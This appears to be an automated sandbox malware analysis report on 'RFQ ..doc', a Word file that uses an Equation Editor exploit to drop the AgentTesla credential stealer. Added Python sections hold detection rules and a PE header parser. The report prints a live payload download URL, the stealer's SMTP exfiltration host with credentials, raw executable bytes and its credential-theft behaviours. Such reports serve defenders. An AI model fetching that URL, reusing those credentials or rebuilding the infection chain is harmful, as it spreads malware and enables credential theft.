Analysis Report RFQ ..doc

Overview

General Information

Sample Name: RFQ ..doc
Analysis ID: 385437
MD5: 8648267830a23e39c5bc162f4ad72f85
SHA1: 6a0436200203698fbb93170bb93ddc794d5f968e
SHA256: a1b7cd862762ff80cf95b544e80dfc6f887d9e0e9a8fffeec7c2574812b917d6
Tags: doc

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: Scheduled temp file as task from temp location
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains very large array initializations
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Office equation editor drops PE file
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Uses schtasks.exe or at.exe to add and modify task schedules
Adds / modifies Windows certificates
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to detect virtual machines (SLDT)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

AV Detection:

Antivirus detection for URL or domain
Source: http://rotronics.com.ph/docxxx/dec/ZhIOjFmINIXbKXm.exe Avira URL Cloud: Label: malware
Found malware configuration
Source: 7.2.rghbyjuyktyjrthbgvfsfhytrrgfsd.exe.400000.2.unpack Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "efiz@glimpse-it.co@Mexico1.,mail.privateemail.com"}
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\cAFIUeWyVQPJe.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ZhIOjFmINIXbKXm[1].exe Joe Sandbox ML: detected

Exploits:

Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
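The three Sigma hits in the Signatures list (EQNEDT32.EXE connecting to internet, File Dropped By EQNEDT32EXE, Scheduled temp file as task from temp location) and the process-creation evidence above describe one chain: Equation Editor, which has no legitimate reason to touch the network or write executables, downloads a PE, drops it under %AppData%, runs it, and the dropped stage persists with schtasks and exfiltrates over SMTP submission (587). The following Python is an added example, not tooling from the Joe Sandbox report: it encodes those rules and runs them over Sysmon-style events (ID 1 process create, 3 network connection, 11 file create). The event list is constructed from paths, IPs and ports in this report; the parent of EQNEDT32.EXE, the schtasks command line, the task name and the mail-client allow-list are assumptions.

```python
"""Rules for the EQNEDT32.EXE exploitation chain, run over Sysmon-style events.

EventID 1 = process creation, 3 = network connection, 11 = file creation.
Added example; not part of the Joe Sandbox report.
"""
from typing import Dict, List, Tuple

EQNEDT = "eqnedt32.exe"
# Assumption: the only processes expected to use the SMTP submission port.
MAIL_CLIENTS = {"outlook.exe", "thunderbird.exe"}
# User-writable locations from which this chain dropped and scheduled files.
USER_WRITABLE = (
    "\\appdata\\roaming\\",
    "\\appdata\\local\\temp\\",
    "\\appdata\\local\\microsoft\\windows\\temporary internet files\\",
    "\\users\\public\\",
)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path ('' for an empty path)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def in_user_writable(text: str) -> bool:
    t = text.lower()
    return any(seg in t for seg in USER_WRITABLE)


def evaluate(ev: Dict) -> List[str]:
    """Names of the rules a single event matches (empty list = nothing suspicious)."""
    hits: List[str] = []
    image = basename(ev.get("Image", ""))
    if ev["EventID"] == 1:
        # Equation Editor spawning anything is the CVE-2017-11882 / CVE-2018-0802 pattern.
        if basename(ev.get("ParentImage", "")) == EQNEDT:
            hits.append("eqnedt32_child_process")
        cmd = ev.get("CommandLine", "").lower()
        if image == "schtasks.exe" and "/create" in cmd and in_user_writable(cmd):
            hits.append("schtasks_from_temp_location")
    elif ev["EventID"] == 3:
        if image == EQNEDT:  # Equation Editor never needs the network
            hits.append("eqnedt32_network_connection")
        if ev.get("DestinationPort") == 587 and image not in MAIL_CLIENTS:
            hits.append("smtp_submission_from_non_mail_process")
    elif ev["EventID"] == 11:
        if image == EQNEDT and ev.get("TargetFilename", "").lower().endswith(".exe"):
            hits.append("eqnedt32_dropped_executable")
    return hits


def scan(events: List[Dict]) -> List[Tuple[int, str]]:
    """(event index, rule name) for every rule hit across the event list."""
    return [(i, rule) for i, ev in enumerate(events) for rule in evaluate(ev)]


EQ = r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
STAGE2 = r"C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe"

# Constructed events modelled on the report's behaviour lines. The parent of
# EQNEDT32.EXE, the schtasks command line/task name and the Outlook event are assumptions.
SAMPLE_EVENTS: List[Dict] = [
    {"EventID": 1, "Image": r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventID": 1, "Image": EQ, "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": f'"{EQ}" -Embedding'},
    {"EventID": 3, "Image": EQ, "DestinationIp": "203.167.7.88", "DestinationPort": 80},
    {"EventID": 11, "Image": EQ, "TargetFilename":
     r"C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ZhIOjFmINIXbKXm[1].exe"},
    {"EventID": 11, "Image": EQ, "TargetFilename": STAGE2},
    {"EventID": 1, "Image": STAGE2, "ParentImage": EQ},
    {"EventID": 1, "Image": r"C:\Windows\SysWOW64\schtasks.exe", "ParentImage": STAGE2,
     "CommandLine": r'schtasks.exe /Create /TN "cAFIUeWyVQPJe" /XML "C:\Users\user\AppData\Local\Temp\tmp1A2B.tmp"'},
    {"EventID": 3, "Image": STAGE2, "DestinationIp": "198.54.122.60", "DestinationPort": 587},
    {"EventID": 3, "Image": r"C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE",
     "DestinationIp": "198.54.122.60", "DestinationPort": 587},
]

if __name__ == "__main__":
    for idx, rule in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}")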

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 4_2_00D5C980
Source: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 4_2_00D5CAC8
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: rotronics.com.ph
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 203.167.7.88:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 203.167.7.88:80

Networking:

Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 198.54.122.60:587
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 12 Apr 2021 12:22:58 GMTServer: ApacheLast-Modified: Mon, 12 Apr 2021 05:14:50 GMTAccept-Ranges: bytesContent-Length: 733184Vary: User-AgentKeep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 aa d6 73 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 e2 0a 00 00 4c 00 00 00 00 00 00 3e 00 0b 00 00 20 00 00 00 20 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 ec ff 0a 00 4f 00 00 00 00 20 0b 00 e8 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 44 e0 0a 00 00 20 00 00 00 e2 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 e8 48 00 00 00 20 0b 00 00 4a 00 00 00 e4 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 0b 00 00 02 00 00 00 2e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 24 7d 00 00 18 76 00 00 03 00 00 00 01 00 00 06 3c f3 00 00 b0 0c 0a 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 1f 00 00 00 00 00 00 00 00 00 28 1f 00 00 0a 28 20 00 00 0a 00 de 02 00 dc 00 28 07 00 00 06 02 6f 21 00 00 0a 00 2a 00 01 10 00 00 02 00 01 00 0e 0f 00 02 00 00 00 00 aa 00 02 16 28 22 00 00 0a 00 02 16 28 23 00 00 0a 00 02 17 28 24 00 00 0a 00 02 16 28 25 00 00 0a 00 02 16 28 26 00 00 0a 00 2a 4e 00 02 28 09 00 00 06 6f ed 00 00 06 28 27 00 00 0a 00 2a 26 00 02 28 28 00 00 0a 00 2a ce 73 29 00 00 0a 80 01 00 00 04 73 2a 00 00 0a 80 02 00 00 04 73 2b 00 00 0a 80 03 00 00 04 73 2c 00 00 0a 80 04 00 00 04 73 2d 00 00 0a 80 05 00 00 04 2a 00 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 2e 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 2f 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 30 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 31 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 05 00 00 11 00
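The Data Raw bytes of the response above are enough to characterise the download without running it: the MZ/PE headers, the section table and, at RVA 0x2008, a CLR runtime header that marks the file as a .NET assembly whose managed resources account for most of the 733184-byte Content-Length (the unpacked stage later shows the "very large array initializations" listed under System Summary). The Python below is an added example, not the sandbox's parser: RAW is the first 0x250 bytes of the dump transcribed from the report and regrouped by PE field; the section-flag decoding reproduces the report's "Static PE information" lines for the .text section. The CONTENT_LENGTH constant comes from the response header above; the machine and flag tables are standard PE constants.

```python
"""Header triage of the executable in the HTTP response above.

RAW = first 0x250 bytes of the report's 'Data Raw' dump (ZhIOjFmINIXbKXm.exe),
regrouped by PE structure. Added example; not the sandbox's own parser.
"""
import struct
from datetime import datetime, timezone

h = bytes.fromhex  # fromhex ignores the spaces used below for readability

RAW = (
    # IMAGE_DOS_HEADER (64 bytes): 'MZ' ... e_lfanew = 0x80 at offset 0x3c
    h("4d5a9000 03000000 04000000 ffff0000 b8000000 00000000 40000000 00000000")
    + bytes(28) + h("80000000")
    # DOS stub: "This program cannot be run in DOS mode."
    + h("0e1fba0e 00b409cd 21b8014c cd215468 69732070 726f6772 616d2063 616e6e6f"
        "74206265 2072756e 20696e20 444f5320 6d6f6465 2e0d0d0a 24000000 00000000")
    # 'PE\0\0' + IMAGE_FILE_HEADER: i386, 3 sections, timestamp, opt hdr 0xe0, chars 0x0102
    + h("50450000 4c010300 aad67360 00000000 00000000 e0000201")
    # IMAGE_OPTIONAL_HEADER32, 96 bytes up to NumberOfRvaAndSizes = 16
    + h("0b015000 00e20a00 004c0000 00000000 3e000b00 00200000 00200b00 00004000"
        "00200000 00020000 04000000 00000000 04000000 00000000 00a00b00 00020000"
        "00000000 02004085 00001000 00100000 00001000 00100000 00000000 10000000")
    # 16 data directories (RVA, size): import, resource, basereloc, IAT, CLR header
    + bytes(8) + h("ecff0a00 4f000000") + h("00200b00 e8480000") + bytes(16)
    + h("00800b00 0c000000") + bytes(48) + h("00200000 08000000") + bytes(8)
    + h("08200000 48000000") + bytes(8)
    # section table: .text / .rsrc / .reloc (40 bytes each)
    + h("2e746578 74000000 44e00a00 00200000 00e20a00 00020000 00000000 00000000 00000000 20000060")
    + h("2e727372 63000000 e8480000 00200b00 004a0000 00e40a00 00000000 00000000 00000000 40000040")
    + h("2e72656c 6f630000 0c000000 00800b00 00020000 002e0b00 00000000 00000000 00000000 40000042")
    + bytes(16)
    # file offset 0x200 (= RVA 0x2000): IAT entry, then IMAGE_COR20_HEADER at RVA 0x2008
    + h("20000b00 00000000")
    + h("48000000 02000500 247d0000 18760000 03000000 01000006 3cf30000 b00c0a00") + bytes(40)
)

MACHINES = {0x14C: "i386", 0x8664: "x86-64", 0x1C0: "ARM", 0xAA64: "ARM64"}
SECTION_FLAGS = {0x20: "CODE", 0x40: "INITIALIZED_DATA", 0x2000000: "DISCARDABLE",
                 0x20000000: "EXECUTE", 0x40000000: "READ", 0x80000000: "WRITE"}
COR_FLAGS = {0x1: "ILONLY", 0x2: "32BITREQUIRED", 0x8: "STRONGNAMESIGNED", 0x10: "NATIVE_ENTRYPOINT"}
CONTENT_LENGTH = 733184  # Content-Length header of the response above


def flag_names(value, table):
    return [name for bit, name in sorted(table.items()) if value & bit]


def rva_to_offset(rva, sections):
    for s in sections:
        if s["va"] <= rva < s["va"] + max(s["vsize"], s["rawsize"]):
            return rva - s["va"] + s["rawptr"]
    raise ValueError(f"RVA {rva:#x} is not backed by any section")


def parse_pe(data: bytes) -> dict:
    """Parse DOS/NT headers, section table and (if present) the CLR header."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    machine, nsec, ts, _, _, opt_size, _chars = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    opt = e_lfanew + 24
    magic, maj_link, min_link = struct.unpack_from("<HBB", data, opt)
    entry = struct.unpack_from("<I", data, opt + 16)[0]
    subsystem, dll_chars = struct.unpack_from("<HH", data, opt + 68)
    n_dirs = struct.unpack_from("<I", data, opt + 92)[0]
    dirs = [struct.unpack_from("<II", data, opt + 96 + 8 * i) for i in range(n_dirs)]
    sections = []
    for i in range(nsec):
        off = opt + opt_size + 40 * i
        vsize, va, rawsize, rawptr = struct.unpack_from("<IIII", data, off + 8)
        sections.append({"name": data[off:off + 8].rstrip(b"\0").decode("ascii", "replace"),
                         "vsize": vsize, "va": va, "rawsize": rawsize, "rawptr": rawptr,
                         "flags": flag_names(struct.unpack_from("<I", data, off + 36)[0], SECTION_FLAGS)})
    info = {"machine": MACHINES.get(machine, hex(machine)), "pe32plus": magic == 0x20B,
            "compiled_utc": datetime.fromtimestamp(ts, tz=timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ"),
            "linker": f"{maj_link}.{min_link}", "entry_point": entry, "subsystem": subsystem,
            "dll_characteristics": dll_chars, "sections": sections, "clr": None}
    clr_rva, clr_size = dirs[14] if n_dirs > 14 else (0, 0)
    if clr_rva and clr_size:  # directory 14 = COM descriptor, i.e. a managed (.NET) image
        _cb, rt_major, rt_minor, _md_rva, md_size, flags, ep_token, _res_rva, res_size = \
            struct.unpack_from("<IHHIIIIII", data, rva_to_offset(clr_rva, sections))
        info["clr"] = {"runtime": f"{rt_major}.{rt_minor}", "flags": flag_names(flags, COR_FLAGS),
                       "entry_token": ep_token, "metadata_size": md_size, "resources_size": res_size}
    return info


def triage(info: dict, file_size: int) -> dict:
    """Verdict hints available from the header alone."""
    clr = info["clr"]
    return {"managed_dotnet": clr is not None,
            "il_only": bool(clr) and "ILONLY" in clr["flags"],
            "resource_fraction": round(clr["resources_size"] / file_size, 3) if clr else 0.0,
            "writable_code_section": any({"WRITE", "EXECUTE"} <= set(s["flags"]) for s in info["sections"])}
```

The compile timestamp decodes to 2021-04-12T05:12:10Z, a few minutes before the server's Last-Modified value, and the managed resource blob is roughly 90% of the file: a small IL-only loader carrying an encrypted payload as a resource, which is what the later "Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'" finding and the injection into a foreign process indicate.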
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 198.54.122.60 198.54.122.60
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: IWEB-ASCA IWEB-ASCA
Uses SMTP (mail sending)
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 198.54.122.60:587
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected:
GET /docxxx/dec/ZhIOjFmINIXbKXm.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: rotronics.com.ph
Connection: Keep-Alive
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{73207C3D-FA20-48C4-87C4-17800DB89026}.tmp
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352492658.0000000006223000.00000004.00000001.sdmp String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: unknown DNS traffic detected: queries for: rotronics.com.ph
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2349110341.0000000002821000.00000004.00000001.sdmp String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2349110341.0000000002821000.00000004.00000001.sdmp String found in binary or memory: http://DynDns.comDynDNS
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2350816750.0000000002C06000.00000004.00000001.sdmp, rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2350857695.0000000002C4E000.00000004.00000001.sdmp String found in binary or memory: http://WWI0qtWzJvCpYcgDStzT.org
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2350771035.0000000002BBE000.00000004.00000001.sdmp String found in binary or memory: http://WWI0qtWzJvCpYcgDStzT.orgDL
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2349110341.0000000002821000.00000004.00000001.sdmp String found in binary or memory: http://ZAGYny.com
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352478215.0000000006210000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352492658.0000000006223000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352492658.0000000006223000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352492658.0000000006223000.00000004.00000001.sdmp String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352492658.0000000006223000.00000004.00000001.sdmp String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2347905343.000000000085A000.00000004.00000020.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354891512.0000000008370000.00000004.00000001.sdmp String found in binary or memory: http://crl.lt/root-c/cacrl.crl0
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352492658.0000000006223000.00000004.00000001.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352492658.0000000006223000.00000004.00000001.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2350121073.000000000298A000.00000004.00000001.sdmp String found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2347905343.000000000085A000.00000004.00000020.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000003.2190303371.00000000062C6000.00000004.00000001.sdmp, rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2347867617.00000000007EE000.00000004.00000020.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.7.dr String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354925203.00000000083AC000.00000004.00000001.sdmp String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2350121073.000000000298A000.00000004.00000001.sdmp String found in binary or memory: http://mail.privateemail.com
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352478215.0000000006210000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352492658.0000000006223000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0%
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352492658.0000000006223000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0-
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352492658.0000000006223000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0/
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352492658.0000000006223000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com05
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352492658.0000000006223000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.entrust.net03
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352492658.0000000006223000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.entrust.net0D
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2350121073.000000000298A000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.sectigo.com0
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354891512.0000000008370000.00000004.00000001.sdmp String found in binary or memory: http://repository.swisssign.com/0
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2106018219.000000000D0B0000.00000002.00000001.sdmp, rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352051934.0000000005E20000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2097214520.000000000287D000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354978003.0000000008720000.00000002.00000001.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000004.00000002.2106018219.000000000D0B0000.00000002.00000001.sdmp, rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352051934.0000000005E20000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354891512.0000000008370000.00000004.00000001.sdmp String found in binary or memory: http://www.acabogacia.org/doc0
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354891512.0000000008370000.00000004.00000001.sdmp String found in binary or memory: http://www.acabogacia.org0
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354891512.0000000008370000.00000004.00000001.sdmp String found in binary or memory: http://www.ancert.com/cps0
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354891512.0000000008370000.00000004.00000001.sdmp String found in binary or memory: http://www.certicamara.com/certicamaraca.crl0
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354891512.0000000008370000.00000004.00000001.sdmp String found in binary or memory: http://www.certicamara.com/certicamaraca.crl0;
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354925203.00000000083AC000.00000004.00000001.sdmp String found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAII.crl0
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352492658.0000000006223000.00000004.00000001.sdmp String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2352492658.0000000006223000.00000004.00000001.sdmp String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354891512.0000000008370000.00000004.00000001.sdmp String found in binary or memory: http://www.dnie.es/dpc0
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354891512.0000000008370000.00000004.00000001.sdmp String found in binary or memory: http://www.e-me.lv/repository0
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354891512.0000000008370000.00000004.00000001.sdmp String found in binary or memory: http://www.e-szigno.hu/RootCA.crt0
Source: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe, 00000007.00000002.2354891512.0000000008370000.00000004.00000001.sdmp String found in binary or memory: http://www.e-szigno.hu/SZSZ/0
